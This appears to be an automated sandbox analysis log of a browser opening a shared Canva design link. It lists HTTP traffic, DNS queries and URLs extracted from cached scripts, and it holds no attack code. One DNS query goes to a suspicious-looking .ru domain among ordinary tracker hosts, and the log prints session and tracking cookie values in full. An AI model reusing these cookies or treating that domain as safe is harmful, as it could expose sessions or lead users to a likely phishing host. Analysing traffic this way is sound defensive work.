    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514845&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=loaded&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=a%20page&ep.custom_doctype_id=TAFJi5FXMSs&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&up.custom_country_code=US&tfd=18006&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: chromecache_136.2.drString found in binary or memory: M:500,X:500,fe:1,De:!1,icon:ZK},{name:"Gfycat",we:["https?://*.gfycat.com/*","https?://gfycat.com/*"].map(Az),M:960,X:540,fe:1,De:!1,icon:ZK},{name:"Twitter",we:["https?://twitter.com/*","https?://www.twitter.com/*"].map(Az),M:270,X:440,fe:1,De:!1,icon:ZK},{name:"Facebook",we:["https?://facebook.com/*","https?://www.facebook.com/*"].map(Az),M:500,X:500,fe:1,De:!1,icon:ZK},{name:"Tumblr",we:["https?://*.tumblr.com/*"].map(Az),M:510,X:450,fe:1,De:!1,icon:ZK},{name:"Pinterest",we:["https?://pinterest.com*", equals www.facebook.com (Facebook)
    Source: chromecache_136.2.drString found in binary or memory: M:500,X:500,fe:1,De:!1,icon:ZK},{name:"Gfycat",we:["https?://*.gfycat.com/*","https?://gfycat.com/*"].map(Az),M:960,X:540,fe:1,De:!1,icon:ZK},{name:"Twitter",we:["https?://twitter.com/*","https?://www.twitter.com/*"].map(Az),M:270,X:440,fe:1,De:!1,icon:ZK},{name:"Facebook",we:["https?://facebook.com/*","https?://www.facebook.com/*"].map(Az),M:500,X:500,fe:1,De:!1,icon:ZK},{name:"Tumblr",we:["https?://*.tumblr.com/*"].map(Az),M:510,X:450,fe:1,De:!1,icon:ZK},{name:"Pinterest",we:["https?://pinterest.com*", equals www.twitter.com (Twitter)
    Source: chromecache_171.2.dr, chromecache_112.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Ik:function(){e=nb()},Gd:function(){d()}}};var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
    Source: chromecache_171.2.dr, chromecache_112.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Hh:e,Fh:f,Gh:g,mi:k,ni:m,Xe:n,Jb:b},q=A.YT;if(q)return q.ready&&q.ready(d),b;var r=A.onYouTubeIframeAPIReady;A.onYouTubeIframeAPIReady=function(){r&&r();d()};G(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(hE(w,"iframe_api")||hE(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,B=0;B<y;B++)if(!ZD&&fE(x[B],p.Xe))return lc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: var jD=function(a,b,c,d,e){var f=aB("fsl",c?"nv.mwt":"mwt",0),g;g=c?aB("fsl","nv.ids",[]):aB("fsl","ids",[]);if(!g.length)return!0;var k=fB(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);T(121);if(m==="https://www.facebook.com/tr/")return T(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!Mz(k,Oz(b, equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: www.canva.com
    Source: global trafficDNS traffic detected: DNS query: static.canva.com
    Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
    Source: global trafficDNS traffic detected: DNS query: o13855.ingest.sentry.io
    Source: global trafficDNS traffic detected: DNS query: font-public.canva.com
    Source: global trafficDNS traffic detected: DNS query: cdn.metadata.io
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
    Source: global trafficDNS traffic detected: DNS query: ct.canva.com
    Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: adservice.google.com
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: sp.analytics.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: p.tvpixel.com
    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
    Source: global trafficDNS traffic detected: DNS query: 58ts.vomlogsffy.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownHTTP traffic detected: POST /api/6097940/envelope/?sentry_key=2bfedc9d03674aacac8aa2762f22fefd&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1Host: o13855.ingest.sentry.ioConnection: keep-aliveContent-Length: 465sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 19 Dec 2024 21:27:25 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:33 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8f4a7a324e4b78d0-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8f4a7a324e4b78d0x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wtrBfESVEFAq%2B65qJt%2FYKkNSSmQxg%2BzaZafd42Q1cdF4cyuk8%2FR99psrvgu7%2BTkEFT4vM%2FF8pfIC4sEcHWto21Ij2nm%2BektuMkK8V0GzRyavCzfXsBh2PVG30v6p%2Byo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:37 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8f4a7a4968c618ea-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8f4a7a4968c618eax-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3E6vkSLwwFx24qWf%2FMCJz%2B95SqhCDghU9x5kFD6eVHoUan8Nzk2mN6y8%2Fp5mJeFzZX3cG9kTLkrkx62NETYqWiJo0VAMOz%2FnEYM%2Bjda1NKj3fSEDTLCfchp2sYq9Xw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:48 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8f4a7a92d8da427c-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8f4a7a92d8da427cx-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAG2Ls8Ugdu1n%2B7jJFndbDej2pRKExZZUpGUn9FDoT3ZONYz3zDalgrgID9qZD4OWJT%2FSZOtKjGkOBtWyZOiBRu4jG0LDC4MiI%2FyqUbE%2BqiUWULRr%2FGOo6CUtQcQb5Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:52 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8f4a7aaa8c6c43fb-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8f4a7aaa8c6c43fbx-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JiO4JEVmGjDI%2BPlRwUWq94yh6JHz166FQ2AXb6mfMqRn7vc2HTHMcnuP4L1mgak7DD%2FWCY06FqfIhskduJrO8E6Lu97fOk0xVgI0SnmQeM29jrOOvfQi8C5wPCaRDMk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:56 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8f4a7ac2aa53c434-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8f4a7ac2aa53c434x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdQy7dK9OHERkYeIuYcxkf5Sxwofb%2F09wBBuMXblGr7hh6WQvP6DTcJHhiGeFa9qrpzoNA7S30DXaBQBRkuHZc32M4kHls9rupv%2Fmfv7wUs5xd5hgXR9piDKSPDu3fg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 21:27:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 272Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUh5Uu1BoG5vaCouqCly%2BofBAkcdcBFwc2CbvaaPYxf%2FZ37YSzvjchyrauCL98A0JzU8prtuVtk22j8vTx6Qg7B6CblmOnJ6hxrn3i0kObzkbsNhcDAE1vaikShx%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10655&min_rtt=4799&rtt_var=8874&sent=995&recv=402&lost=0&retrans=12&sent_bytes=1234134&recv_bytes=51342&delivery_rate=3369749&cwnd=257&unsent_bytes=0&cid=bb6fb99110a70c85&ts=447163&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8f4a7acacac642ef-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2417&min_rtt=2408&rtt_var=910&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1901&delivery_rate=1212624&cwnd=218&unsent_bytes=0&cid=1bfbad4629fa657a&ts=4760&x=0"
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: http://codepen.io/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: http://codesandbox.io/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: http://tally.so/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: http://youtu.be/
    Source: chromecache_148.2.drString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1
    Source: chromecache_138.2.drString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=1
    Source: chromecache_148.2.drString found in binary or memory: https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=1436255686;gtm=45j91e4c
    Source: chromecache_138.2.drString found in binary or memory: https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=1815694816;gtm=45j91e4c
    Source: chromecache_112.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
    Source: chromecache_98.2.dr, chromecache_157.2.drString found in binary or memory: https://api-gw.metadata.io
    Source: chromecache_98.2.dr, chromecache_157.2.drString found in binary or memory: https://api.ipify.org?format=json
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://canva-embed.com
    Source: chromecache_171.2.dr, chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://cct.google/taggy/agent.js
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://cdn.iframe.ly
    Source: chromecache_98.2.dr, chromecache_157.2.drString found in binary or memory: https://cdn.metadata.io/pixel/config
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://codepen.io/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://codesandbox.io/
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://drive.google.com/file/
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16-quadratic.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.otf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17-quadratic.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.otf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.woff)
